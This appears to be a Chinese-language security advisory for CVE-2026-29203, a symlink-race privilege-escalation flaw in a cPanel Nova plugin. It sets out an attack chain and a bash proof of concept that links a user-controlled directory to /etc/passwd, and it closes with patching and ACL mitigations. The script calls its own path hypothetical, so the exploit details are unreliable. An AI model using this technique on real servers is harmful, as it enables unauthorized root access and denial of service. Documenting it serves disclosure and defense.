CVE-2026-29203 cPanel Nova插件权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-29203

漏洞类型

权限提升, 符号链接竞争

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

cPanel Nova

漏洞概述

cPanel Nova 插件中的 Cpanel::Nova::Connector 组件存在严重的安全漏洞。由于在执行 chmod 调用时未能正确处理符号链接，导致其跟随用户创建的符号链接路径。经过身份验证的低权限攻击者可利用此问题，在系统上任意文件或目录设置 root 权限，进而导致拒绝服务或实现本地特权提升，严重威胁服务器安全。

技术细节

该漏洞的核心原理在于 cPanel Nova 插件中的 `Cpanel::Nova::Connector` 模块在执行文件权限变更操作时，未对目标路径进行充分的校验，直接调用了 `chmod` 函数。在 Linux 系统中，`chmod` 默认会跟随符号链接。攻击者首先需要在用户主目录下可控的 legacy Nova 路径中，创建一个指向敏感系统文件（如 /etc/passwd 或关键配置文件）的符号链接。当插件服务以 root 权限执行维护任务并调用 chmod 修改该路径权限时，由于存在符号链接，权限修改操作实际上应用到了攻击者指定的敏感文件上。这可能导致系统关键文件权限被错误设置，引发系统崩溃（DoS），或者赋予攻击者对敏感文件的读写权限，从而结合其他技术手段实现从普通用户到 root 用户的本地权限提升。

攻击链分析

STEP 1

1. 获取访问权限

攻击者需要一个经过身份验证的低权限 cPanel 用户账号。

STEP 2

2. 创建恶意符号链接

攻击者在用户主目录下可控制的 legacy Nova 路径中，创建一个指向敏感系统文件（如 /etc/shadow 或 /etc/passwd）的符号链接。

STEP 3

3. 触发权限变更

等待 cPanel 的定期维护任务或插件操作触发 Cpanel::Nova::Connector，该组件会以 root 权限对该路径执行 chmod 操作。

STEP 4

4. 利用漏洞

由于 chmod 跟随符号链接，系统关键文件的权限被修改。攻击者利用错误设置的权限读取敏感数据或破坏系统文件，实现提权或 DoS。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-29203
# Description: Exploit symlink vulnerability in cPanel Nova plugin chmod call.
# Impact: Local Privilege Escalation or DoS

TARGET_FILE="/etc/passwd"  # Target file to modify permissions
# User-controlled legacy Nova path (hypothetical path based on description)
NOVA_LEGACY_PATH="$HOME/.cpanel/nova/legacy" 
SYMLINK_NAME="exploit_symlink"

echo "[+] Exploit start: CVE-2026-29203"

# 1. Create the directory if it doesn't exist
mkdir -p "$NOVA_LEGACY_PATH"

# 2. Create a symbolic link pointing to a root-owned system file
ln -s -f "$TARGET_FILE" "$NOVA_LEGACY_PATH/$SYMLINK_NAME"

echo "[+] Symlink created at: $NOVA_LEGACY_PATH/$SYMLINK_NAME"
echo "[+] Symlink points to: $TARGET_FILE"
echo "[*] Wait for the cPanel cron job or maintenance task to trigger."
echo "[*] When the task runs 'chmod' on the legacy path, $TARGET_FILE will be affected."

# End of PoC

影响范围

cPanel Nova Plugin < 2026-05-08 Security Update

防御指南

临时缓解措施

建议立即升级到包含安全补丁的最新版 cPanel Nova 插件。如果无法立即升级，可暂时禁用 Nova 插件或通过文件系统 ACL（访问控制列表）移除用户对相关 legacy 目录的写入权限，以防止恶意符号链接的创建。